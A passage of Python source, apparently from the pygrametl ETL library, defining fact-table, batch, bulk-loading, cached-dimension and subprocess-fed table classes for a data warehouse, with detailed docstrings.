self.targetconnection.execute(self.rowlookupsql,
{self.root.key: keyvalue})
res = self.targetconnection.fetchone(self.allnames)
self._after_getbykey(keyvalue, res, fullrow)
return res
def _before_getbykey(self, keyvalue, fullrow=False):
return None
def _after_getbykey(self, keyvalue, resultrow, fullrow=False):
pass
def getbyvals(self, values, namemapping={}, fullrow=False):
"""Return a list of all rows with values identical to the given.
Arguments:
- values: a dict which must hold a subset of the tables attributes.
All rows that have identical values for all attributes in this
dict are returned.
- namemapping: an optional namemapping (see module's documentation)
- fullrow: a flag deciding if the full row (with data from
all tables in the snowflake) should be returned. If False,
only data from the lowest level in the hierarchy (i.e., the table
the closest to the fact table) is returned. Default: False
"""
res = self._before_getbyvals(values, namemapping)
if res is not None:
return res
if not fullrow:
res = self.root.getbyvals(values, namemapping)
else:
# select all attributes from the table.
# The attributes available from the
# values dict are used in the WHERE clause.
attstouse = [a for a in self.allnames
if a in values or a in namemapping]
sqlwhere = " WHERE " + \
" AND ".join(["%s = %%(%s)s" % (att, att) for att in attstouse])
self.targetconnection.execute(self.alljoinssql + sqlwhere,
values, namemapping)
res = [r for r in self.targetconnection.rowfactory(self.allnames)]
self._after_getbyvals(values, namemapping, res)
return res
def _before_getbyvals(self, values, namemapping, fullrow=False):
return None
def _after_getbyvals(self, values, namemapping, resultrows, fullrow=False):
pass
def update(self, row, namemapping={}):
"""Update rows in the participating dimension tables.
If the key of a participating dimension D is in the given row,
D.update(...) is invoked.
Note that this function is not good to use for updating a foreign
key which here has the same name as the referenced primary key: The
referenced table could then also get updated unless it is ensured
that none of its attributes are present in the given row.
In other words, it is often better to use the update function
directly on the Dimensions that should be updated.
Arguments:
- row: a dict. If the key of a participating dimension D is in the
dict, D.update(...) is invoked.
- namemapping: an optional namemapping (see module's documentation)
"""
res = self._before_update(row, namemapping)
if res is not None:
return
for l in self.levellist:
for t in self.levels[l]:
if t.key in row or \
(t.key in namemapping and namemapping[t.key] in row):
t.update(row, namemapping)
self._after_update(row, namemapping)
def _before_update(self, row, namemapping):
return None
def _after_update(self, row, namemapping):
pass
def ensure(self, row, namemapping={}):
"""Lookup the given member. If that fails, insert it. Return key value.
If the member must be inserted, data is automatically inserted in
all participating tables where (part of) the member is not
already represented.
Key values for different levels may be added to the row. It is
NOT guaranteed that key values for all levels exist in row
afterwards.
Arguments:
- row: the row to lookup or insert. Must contain the lookup
attributes.
- namemapping: an optional namemapping (see module's documentation)
"""
(key, ignored) = self.__ensure_helper(self.root, row, namemapping,
False)
return key
def insert(self, row, namemapping={}):
"""Insert the given member. If that fails, insert it. Return key value.
Data is automatically inserted in all participating tables where
(part of) the member is not already represented. If nothing is
inserted at all, a ValueError is raised.
Key values for different levels may be added to the row. It is
NOT guaranteed that key values for all levels exist in row
afterwards.
Arguments:
- row: the row to lookup or insert. Must contain the lookup
attributes.
- namemapping: an optional namemapping (see module's documentation)
"""
key = self._before_insert(row, namemapping)
if key is not None:
return key
(key, insertdone) = self.__ensure_helper(self.root, row, namemapping,
False)
if not insertdone:
raise ValueError("Member already present - nothing inserted")
self._after_insert(row, namemapping, key)
return key
def _before_insert(self, row, namemapping):
return None
def _after_insert(self, row, namemapping, newkeyvalue):
pass
def endload(self):
"""Finalize the load."""
pass
def __ensure_helper(self, dimension, row, namemapping, insertdone):
""" """
# NB: Has side-effects: Key values are set for all dimensions
key = None
retry = False
try:
key = dimension.lookup(row, namemapping)
except KeyError:
retry = True # it can happen that the keys for the levels above
# aren't there yet but should be used as lookup
# attributes in dimension.
# Below we find them and we should then try a
# lookup again before we move on to do an insertion
if key is not None:
row[(namemapping.get(dimension.key) or dimension.key)] = key
return (key, insertdone)
# Else recursively get keys for refed tables and then insert
for refed in self.refs.get(dimension, []):
(key, insertdone) = self.__ensure_helper(refed, row, namemapping,
insertdone)
# We don't need to set the key value in the row as this already
# happened in the recursive step.
# We set insertdone = True to know later that we actually
# inserted something
if retry or self.expectboguskeyvalues:
# The following is similar to
# key = dimension.ensure(row, namemapping)
# but we set insertdone here.
key = dimension.lookup(row, namemapping)
if key is None:
key = dimension.insert(row, namemapping)
insertdone = True
else:
# We don't need to lookup again since no attributes were
# missing (no KeyError) and we don't expect bogus values.
# So we can proceed directly to do an insert.
key = dimension.insert(row, namemapping)
insertdone = True
row[(namemapping.get(dimension.key) or dimension.key)] = key
return (key, insertdone)
def scdensure(self, row, namemapping={}):
"""Lookup or insert a version of a slowly changing dimension member.
.. Warning::
Still experimental!!! For now we require that only the
root is a SlowlyChangingDimension.
.. Note:: Has side-effects on the given row.
Arguments:
- row: a dict containing the attributes for the member.
- namemapping: an optional namemapping (see module's documentation)
"""
# Still experimental!!! For now we require that only the
# root is a SlowlyChangingDimension.
# If we were to allow other nodes to be SCDs, we should require
# that those between those nodes and the root (incl.) were also
# SCDs.
for dim in self.levels.get(1, []):
(keyval, ignored) = self.__ensure_helper(dim, row, namemapping,
False)
row[(namemapping.get(dim.key) or dim.key)] = keyval
row[(namemapping.get(self.root.key) or self.root.key)] = \
self.root.scdensure(row, namemapping)
return row[(namemapping.get(self.root.key) or self.root.key)]
class FactTable(object):
"""A class for accessing a fact table in the DW."""
def __init__(self, name, keyrefs, measures=(), targetconnection=None):
"""Arguments:
- name: the name of the fact table in the DW
- keyrefs: a sequence of attribute names that constitute the
primary key of the fact tables (i.e., the dimension references)
- measures: a possibly empty sequence of measure names. Default: ()
- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
"""
if targetconnection is None:
targetconnection = pygrametl.getdefaulttargetconnection()
self.targetconnection = targetconnection
self.name = name
self.keyrefs = keyrefs
self.measures = measures
self.all = [k for k in keyrefs] + [m for m in measures]
pygrametl._alltables.append(self)
# Create SQL
# INSERT INTO name (key1, ..., keyn, meas1, ..., measn)
# VALUES (%(key1)s, ..., %(keyn)s, %(meas1)s, ..., %(measn)s)
self.insertsql = "INSERT INTO " + name + "(" + \
", ".join(self.all) + ") VALUES (" + \
", ".join(["%%(%s)s" % (att,) for att in self.all]) + ")"
# SELECT key1, ..., keyn, meas1, ..., measn FROM name
# WHERE key1 = %(key1)s AND ... keyn = %(keyn)s
self.lookupsql = "SELECT " + ",".join(self.all) + " FROM " + name + \
" WHERE " + " AND ".join(["%s = %%(%s)s" % (k, k)
for k in self.keyrefs])
def insert(self, row, namemapping={}):
"""Insert a fact into the fact table.
Arguments:
- row: a dict at least containing values for the keys and measures.
- namemapping: an optional namemapping (see module's documentation)
"""
tmp = self._before_insert(row, namemapping)
if tmp:
return
self.targetconnection.execute(self.insertsql, row, namemapping)
self._after_insert(row, namemapping)
def _before_insert(self, row, namemapping):
return None
def _after_insert(self, row, namemapping):
pass
def _emptyfacttonone(self, argdict):
"""Return None if the given argument only contains None values,
otherwise return the given argument
"""
for k in self.keyrefs:
if argdict[k] is not None:
return argdict
return None
def lookup(self, keyvalues, namemapping={}):
"""Lookup a fact from the given key values. Return key and measure vals.
Return None if no fact is found.
Arguments:
- keyvalues: a dict at least containing values for all keys
- namemapping: an optional namemapping (see module's documentation)
"""
res = self._before_lookup(keyvalues, namemapping)
if res:
return self._emptyfacttonone(res)
self.targetconnection.execute(self.lookupsql, keyvalues, namemapping)
res = self.targetconnection.fetchone(self.all)
self._after_lookup(keyvalues, namemapping, res)
return self._emptyfacttonone(res)
def _before_lookup(self, keyvalues, namemapping):
return None
def _after_lookup(self, keyvalues, namemapping, resultrow):
pass
def ensure(self, row, compare=False, namemapping={}):
"""Ensure that a fact is present (insert it if it is not already there).
Arguments:
- row: a dict at least containing the attributes of the fact table
- compare: a flag deciding if measure vales from a fact that was
looked up are compared to those in the given row. If True and
differences are found, a ValueError is raised. Default: False
- namemapping: an optional namemapping (see module's documentation)
"""
res = self.lookup(row, namemapping)
if not res:
self.insert(row, namemapping)
return False
elif compare:
for m in self.measures:
if m in row and row[m] != res.get(m):
raise ValueError(
"The existing fact has different measure values")
return True
def endload(self):
"""Finalize the load."""
pass
class BatchFactTable(FactTable):
"""A class for accessing a fact table in the DW. This class performs
performs insertions in batches.
"""
def __init__(self, name, keyrefs, measures=(), batchsize=10000,
targetconnection=None):
"""Arguments:
- name: the name of the fact table in the DW
- keyrefs: a sequence of attribute names that constitute the
primary key of the fact tables (i.e., the dimension references)
- measures: a possibly empty sequence of measure names. Default: ()
- batchsize: an int deciding many insert operations should be done
in one batch. Default: 10000
- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
"""
FactTable.__init__(self,
name=name,
keyrefs=keyrefs,
measures=measures,
targetconnection=targetconnection)
self.__batchsize = batchsize
self.__batch = []
def _before_insert(self, row, namemapping):
self.__batch.append(pygrametl.project(self.all, row, namemapping))
if len(self.__batch) == self.__batchsize:
self.__insertnow()
return True # signal that we did something
def _before_lookup(self, keyvalues, namemapping):
self.__insertnow()
def endload(self):
"""Finalize the load."""
self.__insertnow()
def __insertnow(self):
if self.__batch:
self.targetconnection.executemany(self.insertsql, self.__batch)
self.__batch = []
class _BaseBulkloadable(object):
"""Common functionality for bulkloadable tables"""
def __init__(self, name, atts, bulkloader,
fieldsep='\t', rowsep='\n', nullsubst=None,
tempdest=None, bulksize=500000, usefilename=False,
encoding=None, dependson=()):
r"""Arguments:
- name: the name of the table in the DW
- atts: a sequence of the bulkloadable tables' attribute names
- bulkloader: A method
m(name, attributes, fieldsep, rowsep, nullsubst, tempdest) that
is called to load data from a temporary file into the DW. The
argument "attributes" is a list of the names of the columns to
insert values into and show the order in which the attribute
values appear in the temporary file. The rest of the arguments
are similar to those arguments with identical names that are given
to _BaseBulkloadable.__init__ as described here. The argument
"tempdest" can, however, be 1) a string with a filename or
2) a file object. This is determined by the usefilename argument to
_BaseBulkloadable.__init__ (see below).
- fieldsep: a string used to separate fields in the temporary
file. Default: '\t'
- rowsep: a string used to separate rows in the temporary file.
Default: '\n'
- nullsubst: an optional string used to replace None values.
If nullsubst=None, no substitution takes place. Default: None
- tempdest: a file object or None. If None a named temporary file
is used. Default: None
- bulksize: an int deciding the number of rows to load in one
bulk operation. Default: 500000
- usefilename: a value deciding if the file should be passed to the
bulkloader by its name instead of as a file-like object.
Default: False
- encoding: a string with the encoding to use. If None,
locale.getpreferredencoding() is used. This argument is
ignored under Python 2! Default: None
- dependson: a sequence of other bulkloadble tables that should
be loaded before this instance does bulkloading (e.g., if
a fact table has foreign keys to some bulkloaded dimension tables).
Default: ()
"""
self.name = name
self.atts = atts
self.__close = False
if tempdest is None:
self.__close = True
self.__namedtempfile = tempfile.NamedTemporaryFile()
tempdest = self.__namedtempfile.file
self.fieldsep = fieldsep
self.rowsep = rowsep
self.nullsubst = nullsubst
self.bulkloader = bulkloader
self.tempdest = tempdest
self.bulksize = bulksize
self.usefilename = usefilename
if encoding is not None:
self.encoding = encoding
else:
self.encoding = locale.getpreferredencoding()
self.dependson = dependson
if version_info[0] == 2:
# Python 2: We ignore the specified encoding
self._tobytes = lambda data, encoding: str(data)
else:
# Python 3: We make _tobytes use the specified encoding:
self._tobytes = lambda data, encoding: bytes(data, encoding)
self.__count = 0
self.__ready = True
def __preparetempfile(self):
self.__namedtempfile = tempfile.NamedTemporaryFile()
self.tempdest = self.__namedtempfile.file
self.__ready = True
def _insertwithnulls(self, row, namemapping={}):
"""Insert (eventually) a row into the table.
Arguments:
- row: a dict at least containing values for each of the tables'
attributes.
- namemapping: an optional namemapping (see module's documentation)
"""
if not self.__ready:
self.__preparetempfile()
rawdata = [row[namemapping.get(att) or att] for att in self.atts]
data = [pygrametl.getstrornullvalue(val, self.nullsubst)
for val in rawdata]
self.__count += 1
self.tempdest.write(
self._tobytes(
"%s%s" % (self.fieldsep.join(data), self.rowsep),
self.encoding))
if self.__count == self.bulksize:
self._bulkloadnow()
def _insertwithoutnulls(self, row, namemapping={}):
"""Insert (eventually) a row into the table.
Arguments:
- row: a dict at least containing values for each of the tables'
attributes.
- namemapping: an optional namemapping (see module's documentation)
"""
if not self.__ready:
self.__preparetempfile()
data = [str(row[namemapping.get(att) or att]) for att in self.atts]
self.__count += 1
self.tempdest.write(
self._tobytes("%s%s" % (self.fieldsep.join(data), self.rowsep),
self.encoding))
if self.__count == self.bulksize:
self._bulkloadnow()
def _bulkloadnow(self):
if self.__count == 0:
return
for b in self.dependson:
if hasattr(b, '_bulkloadnow'):
b._bulkloadnow()
self.tempdest.flush()
self.tempdest.seek(0)
self.bulkloader(self.name, self.atts,
self.fieldsep, self.rowsep, self.nullsubst,
self.usefilename and self.__namedtempfile.name or
self.tempdest)
self.tempdest.seek(0)
self.tempdest.truncate(0)
self.__count = 0
def endload(self):
"""Finalize the load."""
self._bulkloadnow()
if self.__close:
try:
self.__namedtempfile.close()
except OSError:
pass # may happen if the instance was decoupled
self.__ready = False
def _decoupled(self):
if self.__close:
# We need to make a private tempfile
self.__namedtempfile = tempfile.NamedTemporaryFile()
self.tempdest = self.__namedtempfile.file
class BulkFactTable(_BaseBulkloadable):
"""Class for addition of facts to a fact table. Reads are not supported. """
def __init__(self, name, keyrefs, measures, bulkloader,
fieldsep='\t', rowsep='\n', nullsubst=None,
tempdest=None, bulksize=500000, usefilename=False,
encoding=None, dependson=()):
r"""Arguments:
- name: the name of the fact table in the DW
- keyrefs: a sequence of attribute names that constitute the
primary key of the fact tables (i.e., the dimension references)
- measures: a possibly empty sequence of measure names.
- bulkloader: A method
m(name, attributes, fieldsep, rowsep, nullsubst, tempdest) that
is called to load data from a temporary file into the DW. The
argument "attributes" is the combination of keyrefs and measures
(i.e., a list of the names of the columns to insert values into)
and show the order in which the attribute values appear in the
temporary file. The rest of the arguments are similar to those
arguments with identical names that are given to
BulkFactTable.__init__ as described here. The argument "tempdest"
can, however, be 1) a string with a filename or 2) a file
object. This is determined by the usefilename argument to
BulkFactTable.__init__ (see below).
- fieldsep: a string used to separate fields in the temporary
file. Default: '\t'
- rowsep: a string used to separate rows in the temporary file.
Default: '\n'
- nullsubst: an optional string used to replace None values.
If nullsubst=None, no substitution takes place. Default: None
- tempdest: a file object or None. If None a named temporary file
is used. Default: None
- bulksize: an int deciding the number of rows to load in one
bulk operation. Default: 500000
- usefilename: a value deciding if the file should be passed to the
bulkloader by its name instead of as a file-like object. This is,
e.g., necessary when the bulk loading is invoked through SQL
(instead of directly via a method on the PEP249 driver). It is
also necessary if the bulkloader runs in another process
(for example, when if the BulkFactTable is wrapped by a
DecoupledFactTable and invokes the bulkloader on a shared
connection wrapper). Default: False
- encoding: a string with the encoding to use. If None,
locale.getpreferredencoding() is used. This argument is
ignored under Python 2! Default: None
- dependson: a sequence of other bulkloadble tables that should
be bulkloaded before this instance does bulkloading (e.g., if
the fact table has foreign keys to some bulk-loaded dimension
table). Default: ()
"""
_BaseBulkloadable.__init__(self,
name=name,
atts=[k for k in keyrefs] + [m for m in measures],
bulkloader=bulkloader,
fieldsep=fieldsep,
rowsep=rowsep,
nullsubst=nullsubst,
tempdest=tempdest,
bulksize=bulksize,
usefilename=usefilename,
encoding=encoding,
dependson=dependson)
if nullsubst is None:
self.insert = self._insertwithoutnulls
else:
self.insert = self._insertwithnulls
pygrametl._alltables.append(self)
def insert(self, row, namemapping={}):
"""Insert a fact into the fact table.
Arguments:
- row: a dict at least containing values for the keys and measures.
- namemapping: an optional namemapping (see module's documentation)
"""
pass # Is set to _insertwithnulls or _inserwithoutnulls from __init__
class BulkDimension(_BaseBulkloadable, CachedDimension):
"""A class for accessing a dimension table. Does caching and bulk loading.
Unlike CachedBulkDimension, this class always caches all dimension data.
The class caches all dimension members in memory. Newly inserted
dimension members are also put into the cache. The class does not
INSERT new dimension members into the underlying database table
immediately when insert or ensure is invoked. Instead, the class does
bulk loading of new members. When a certain amount of new dimension
members have been inserted (configurable through __init__'s bulksize
argument), a user-provided bulkloader method is called.
Calls of lookup and ensure will only use the cache and does not invoke
any database operations. It is also possible to use the update and
getbyvals methods, but calls of these will invoke the bulkloader first
(and performance can degrade). If the dimension table's full rows
are cached (by setting __init__'s cachefullrow argument to True), a
call of getbykey will only use the cache, but if cachefullrows==False
(which is the default), the bulkloader is again invoked first.
We assume that the DB doesn't change or add any attribute
values that are cached.
For example, a DEFAULT value in the DB or automatic type coercion can
break this assumption.
"""
def __init__(self, name, key, attributes, bulkloader, lookupatts=(),
idfinder=None, defaultidvalue=None, rowexpander=None,
cachefullrows=False,
fieldsep='\t', rowsep='\n', nullsubst=None,
tempdest=None, bulksize=500000, usefilename=False,
encoding=None, dependson=(), targetconnection=None):
r"""Arguments:
- name: the name of the dimension table in the DW
- key: the name of the primary key in the DW
- attributes: a sequence of the attribute names in the dimension
table. Should not include the name of the primary key which is
given in the key argument.
- bulkloader: A method
m(name, attributes, fieldsep, rowsep, nullsubst, tempdest) that
is called to load data from a temporary file into the DW. The
argument "attributes" is a list of the names of the columns to
insert values into and show the order in which the attribute
values appear in the temporary file. The rest of the arguments
are similar to those arguments with identical names that are
described below. The argument "tempdest" can, however, be
1) a string with a filename or 2) a file object. This is
determined by the usefilename argument (see below).
- lookupatts: A subset of the attributes that uniquely identify
a dimension members. These attributes are thus used for looking
up members. If not given, it is assumed that
lookupatts = attributes
- idfinder: A function(row, namemapping) -> key value that assigns
a value to the primary key attribute based on the content of the
row and namemapping. If not given, it is assumed that the primary
key is an integer, and the assigned key value is then the current
maximum plus one.
- defaultidvalue: An optional value to return when a lookup fails.
This should thus be the ID for a preloaded "Unknown" member.
- rowexpander: A function(row, namemapping) -> row. This function
is called by ensure before insertion if a lookup of the row fails.
This is practical if expensive calculations only have to be done
for rows that are not already present. For example, for a date
dimension where the full date is used for looking up rows, a
rowexpander can be set such that week day, week number, season,
year, etc. are only calculated for dates that are not already
represented. If not given, no automatic expansion of rows is
done.
- cachefullrows: a flag deciding if full rows should be
cached. If not, the cache only holds a mapping from
lookupattributes to key values. Default: False.
- fieldsep: a string used to separate fields in the temporary
file. Default: '\t'
- rowsep: a string used to separate rows in the temporary file.
Default: '\n'
- nullsubst: an optional string used to replace None values.
If nullsubst=None, no substitution takes place. Default: None
- tempdest: a file object or None. If None a named temporary file
is used. Default: None
- bulksize: an int deciding the number of rows to load in one
bulk operation. Default: 500000
- usefilename: a value deciding if the file should be passed to the
bulkloader by its name instead of as a file-like object. This is,
e.g., necessary when the bulk loading is invoked through SQL
(instead of directly via a method on the PEP249 driver). It is
also necessary if the bulkloader runs in another process.
Default: False
- dependson: a sequence of other bulkloadble tables that should
be loaded before this instance does bulkloading. Default: ()
- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
- encoding: a string with the encoding to use. If None,
locale.getpreferredencoding() is used. This argument is
ignored under Python 2! Default: None
"""
_BaseBulkloadable.__init__(self,
name=name,
atts=[key] + [a for a in attributes],
bulkloader=bulkloader,
fieldsep=fieldsep,
rowsep=rowsep,
nullsubst=nullsubst,
tempdest=tempdest,
bulksize=bulksize,
usefilename=usefilename,
encoding=encoding,
dependson=dependson)
CachedDimension.__init__(self,
name=name,
key=key,
attributes=attributes,
lookupatts=lookupatts,
idfinder=idfinder,
defaultidvalue=defaultidvalue,
rowexpander=rowexpander,
size=0,
prefill=True,
cachefullrows=cachefullrows,
cacheoninsert=True,
usefetchfirst=False,
targetconnection=targetconnection)
self.emptyrow = dict(zip(self.atts, len(self.atts) * (None,)))
if nullsubst is None:
self._insert = self._insertwithoutnulls
else:
self._insert = self._insertwithnulls
def _before_getbyvals(self, values, namemapping):
self._bulkloadnow()
return None
def _before_update(self, row, namemapping):
self._bulkloadnow()
return None
def getbykey(self, keyvalue):
"""Lookup and return the row with the given key value.
If no row is found in the dimension table, the function returns
a row where all values (including the key) are None.
"""
if not self.cachefullrows:
self._bulkloadnow()
return CachedDimension.getbykey(self, keyvalue)
# else we do cache full rows and all rows are cached...
if isinstance(keyvalue, dict):
keyvalue = keyvalue[self.key]
row = self._before_getbykey(keyvalue)
if row is not None:
return row
else:
# Do not look in the DB; we cache everything
return self.emptyrow.copy()
def insert(self, row, namemapping={}):
"""Insert the given row. Return the new key value.
Arguments:
- row: the row to insert. The dict is not updated. It must contain
all attributes, and is allowed to contain more attributes than
that.
- namemapping: an optional namemapping (see module's documentation)
"""
res = self._before_insert(row, namemapping)
if res is not None:
return res
key = (namemapping.get(self.key) or self.key)
if row.get(key) is None:
keyval = self.idfinder(row, namemapping)
row = dict(row) # Make a copy to change
row[key] = keyval
else:
keyval = row[key]
self._insert(row, namemapping)
self._after_insert(row, namemapping, keyval)
return keyval
class CachedBulkDimension(_BaseBulkloadable, CachedDimension):
"""A class for accessing a dimension table. Does caching and bulk loading.
Unlike BulkDimension, the cache size is configurable and lookups may
thus lead to database operations.
The class caches dimension members in memory. Newly inserted
dimension members are also put into the cache. The class does not
INSERT new dimension members into the underlying database table
immediately when insert or ensure is invoked. Instead, the class does
bulk loading of new members. When a certain amount of new dimension
members have been inserted (configurable through __init__'s bulksize
argument), a user-provided bulkloader method is called.
It is also possible to use the update and getbyvals methods, but calls
of these will invoke the bulkloader first (and performance can
degrade). If the dimension table's full rows are cached (by setting
__init__'s cachefullrow argument to True), a call of getbykey will only
use the cache, but if cachefullrows==False (which is the default), the
bulkloader is again invoked first.
We assume that the DB doesn't change or add any attribute
values that are cached.
For example, a DEFAULT value in the DB or automatic type coercion can
break this assumption.
"""
def __init__(self, name, key, attributes, bulkloader, lookupatts=(),
idfinder=None, defaultidvalue=None, rowexpander=None,
usefetchfirst=False, cachefullrows=False,
fieldsep='\t', rowsep='\n', nullsubst=None,
tempdest=None, bulksize=5000, cachesize=10000,
usefilename=False, encoding=None, dependson=(),
targetconnection=None):
r"""Arguments:
- name: the name of the dimension table in the DW
- key: the name of the primary key in the DW
- attributes: a sequence of the attribute names in the dimension
table. Should not include the name of the primary key which is
given in the key argument.
- bulkloader: A method
m(name, attributes, fieldsep, rowsep, nullsubst, tempdest) that
is called to load data from a temporary file into the DW. The
argument "attributes" is a list of the names of the columns to
insert values into and show the order in which the attribute
values appear in the temporary file. The rest of the arguments
are similar to those arguments with identical names that are
described below. The argument "tempdest" can, however, be
1) a string with a filename or 2) a file object. This is
determined by the usefilename argument (see below).
- lookupatts: A subset of the attributes that uniquely identify
a dimension members. These attributes are thus used for looking
up members. If not given, it is assumed that
lookupatts = attributes
- idfinder: A function(row, namemapping) -> key value that assigns
a value to the primary key attribute based on the content of the
row and namemapping. If not given, it is assumed that the primary
key is an integer, and the assigned key value is then the current
maximum plus one.
- defaultidvalue: An optional value to return when a lookup fails.
This should thus be the ID for a preloaded "Unknown" member.
- rowexpander: A function(row, namemapping) -> row. This function
is called by ensure before insertion if a lookup of the row fails.
This is practical if expensive calculations only have to be done
for rows that are not already present. For example, for a date
dimension where the full date is used for looking up rows, a
rowexpander can be set such that week day, week number, season,
year, etc. are only calculated for dates that are not already
represented. If not given, no automatic expansion of rows is
done.
- usefetchfirst: a flag deciding if the SQL:2008 FETCH FIRST
clause is used when prefil is True. Depending on the used DBMS
and DB driver, this can give significant savings wrt. to time and
memory. Not all DBMSs support this clause yet. Default: False
- cachefullrows: a flag deciding if full rows should be
cached. If not, the cache only holds a mapping from
lookupattributes to key values. Default: False.
- fieldsep: a string used to separate fields in the temporary
file. Default: '\t'
- rowsep: a string used to separate rows in the temporary file.
Default: '\n'
- nullsubst: an optional string used to replace None values.
If nullsubst=None, no substitution takes place. Default: None
- tempdest: a file object or None. If None a named temporary file
is used. Default: None
- bulksize: an int deciding the number of rows to load in one
bulk operation. Default: 5000
- cachesize: the maximum number of rows to cache. If less than or equal
to 0, unlimited caching is used. Default: 10000
- usefilename: a value deciding if the file should be passed to the
bulkloader by its name instead of as a file-like object. This is,
e.g., necessary when the bulk loading is invoked through SQL
(instead of directly via a method on the PEP249 driver). It is
also necessary if the bulkloader runs in another process.
Default: False
- dependson: a sequence of other bulkloadble tables that should
be loaded before this instance does bulkloading. Default: ()
- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
- encoding: a string with the encoding to use. If None,
locale.getpreferredencoding() is used. This argument is
ignored under Python 2! Default: None
"""
_BaseBulkloadable.__init__(self,
name=name,
atts=[key] + [a for a in attributes],
bulkloader=bulkloader,
fieldsep=fieldsep,
rowsep=rowsep,
nullsubst=nullsubst,
tempdest=tempdest,
bulksize=bulksize,
usefilename=usefilename,
encoding=encoding,
dependson=dependson)
CachedDimension.__init__(self,
name=name,
key=key,
attributes=attributes,
lookupatts=lookupatts,
idfinder=idfinder,
defaultidvalue=defaultidvalue,
rowexpander=rowexpander,
size=cachesize,
prefill=True,
cachefullrows=cachefullrows,
cacheoninsert=True,
usefetchfirst=usefetchfirst,
targetconnection=targetconnection)
self.emptyrow = dict(zip(self.atts, len(self.atts) * (None,)))
self.__localcache = {}
self.__localkeys = {}
if nullsubst is None:
self._insert = self._insertwithoutnulls
else:
self._insert = self._insertwithnulls
def _before_lookup(self, row, namemapping):
namesinrow = [(namemapping.get(a) or a) for a in self.lookupatts]
searchtuple = tuple([row[n] for n in namesinrow])
if searchtuple in self.__localcache:
return self.__localcache[searchtuple][self.key]
return CachedDimension._before_lookup(self, row, namemapping)
def _before_getbyvals(self, values, namemapping):
self._bulkloadnow()
return None
def _before_update(self, row, namemapping):
self._bulkloadnow()
return None
def _bulkloadnow(self):
emptydict = {}
for key, row in self.__localkeys.items():
self._after_insert(row, emptydict, key)
self.__localcache.clear()
self.__localkeys.clear()
_BaseBulkloadable._bulkloadnow(self)
return
def getbykey(self, keyvalue):
"""Lookup and return the row with the given key value.
If no row is found in the dimension table, the function returns
a row where all values (including the key) are None.
"""
if isinstance(keyvalue, dict):
keyvalue = keyvalue[self.key]
if keyvalue in self.__localkeys:
return self.__localkeys[keyvalue].copy()
return CachedDimension.getbykey(self, keyvalue)
def lookup(self, row, namemapping={}):
return CachedDimension.lookup(self, row, namemapping=namemapping)
def insert(self, row, namemapping={}):
"""Insert the given row. Return the new key value.
Arguments:
- row: the row to insert. The dict is not updated. It must contain
all attributes, and is allowed to contain more attributes than
that.
- namemapping: an optional namemapping (see module's documentation)
"""
row = pygrametl.copy(row, **namemapping)
searchtuple = tuple([row[n] for n in self.lookupatts])
res = self._before_insert(row, {})
if res is not None:
return res
if row.get(self.key) is None:
keyval = self.idfinder(row, {})
row[self.key] = keyval
else:
keyval = row[self.key]
if searchtuple in self.__localcache:
return self.__localcache[searchtuple]
self._insert(row, {})
self.__localcache[searchtuple] = row
self.__localkeys[keyval] = row
return keyval
class SubprocessFactTable(object):
"""Class for addition of facts to a subprocess.
The subprocess can, e.g., be a logger or bulkloader. Reads are not
supported.
Note that a created instance can not be used when endload() has been
called (and endload() is called from pygrametl.commit()).
"""
def __init__(self, keyrefs, measures, executable,
initcommand=None, endcommand=None, terminateafter=-1,
fieldsep='\t', rowsep='\n', nullsubst=None,
buffersize=16384):
r"""Arguments:
- keyrefs: a sequence of attribute names that constitute the
primary key of the fact table (i.e., the dimension references)
- measures: a possibly empty sequence of measure names. Default: ()
- executable: The subprocess to start.
- initcommand: If not None, this command is written to the
subprocess before any data.
- endcommand: If not None, this command is written to the subprocess
after all data has been written.
- terminateafter: If greater than or equal to 0, the subprocess
is terminated after this amount of seconds after the pipe to
the subprocess is closed.
- fieldsep: a string used to separate fields in the output
sent to the subprocess. Default: '\t
- rowsep: a string used to separate rows in the output sent to the
subprocess. Default: '\n'
- nullsubst: an optional string used to replace None values.
If nullsubst=None, no substitution takes place. Default: None
"""
self.all = [k for k in keyrefs] + [m for m in measures]
self.keyrefs = keyrefs
self.measures = measures
self.endcommand = endcommand
self.terminateafter = terminateafter
self.fieldsep = fieldsep
self.rowsep = rowsep
self.nullsubst = nullsubst
self.process = Popen(executable, bufsize=buffersize, shell=True,
stdin=PIPE)
self.pipe = self.process.stdin
if nullsubst is None:
self.insert = self._insertwithoutnulls
else:
self.insert = self._insertwithnulls
if initcommand is not None:
self.pipe.write(initcommand)
pygrametl._alltables.append(self)
def insert(self, row, namemapping={}):
"""Insert a fact into the fact table.
Arguments:
- row: a dict at least containing values for the keys and measures.
- namemapping: an optional namemapping (see module's documentation)
"""
pass # Is set to _insertwithnulls or _inserwithoutnulls from __init__
def _insertwithnulls(self, row, namemapping={}):
"""Insert a fact into the fact table.
Arguments:
- row: a dict at least containing values for the keys and measures.
- namemapping: an optional namemapping (see module's documentation)
"""
rawdata = [row[namemapping.get(att) or att] for att in self.all]
data = [pygrametl.getstrornullvalue(val, self.nullsubst)
for val in rawdata]
self.pipe.write("%s%s" % (self.fieldsep.join(data), self.rowsep))
def _insertwithoutnulls(self, row, namemapping={}):
"""Insert a fact into the fact table.
Arguments:
- row: a dict at least containing values for the keys and measures.
- namemapping: an optional namemapping (see module's documentation)
"""
data = [str(row[namemapping.get(att) or att]) for att in self.all]
self.pipe.write("%s%s" % (self.fieldsep.join(data), self.rowsep))
def endload(self):
"""Finalize the load."""
if self.endcommand is not None:
self.pipe.write(self.endcommand)
self.pipe.close()
if self.terminateafter >= 0:
sleep(self.terminateafter)
self.process.terminate()
else:
self.process.wait()
def _decoupling(self):
"""Raise a TypeError to avoid decoupling (does not happen in Jython)"""
import sys
if sys.platform.startswith('java'):
# In Jython, we use threads for decoupling and we do not have
# to prevent it.
return
raise TypeError('A SubProcessFactTable cannot be decoupled')
class DecoupledDimension(pygrametl.parallel.Decoupled):
"""A Dimension-like class that enables parallelism by executing all
operations on a given Dimension in a separate, dedicated process
(that Dimension is said to be "decoupled").
"""
def __init__(self, dim, returnvalues=True, consumes=(), attstoconsume=(),
batchsize=500, queuesize=200):
"""Arguments:
- dim: the Dimension object to use in a separate process
- returnvalues: decides if return values from method calls on dim
should be kept such that they can be fetched by the caller or
another Decoupled instance
- consumes: a sequence of Decoupled objects from which to fetch
returnvalues (that are used to replace FutureResults in arguments).
Default: ()
- attstoconsume: a sequence of the attribute names in rows that
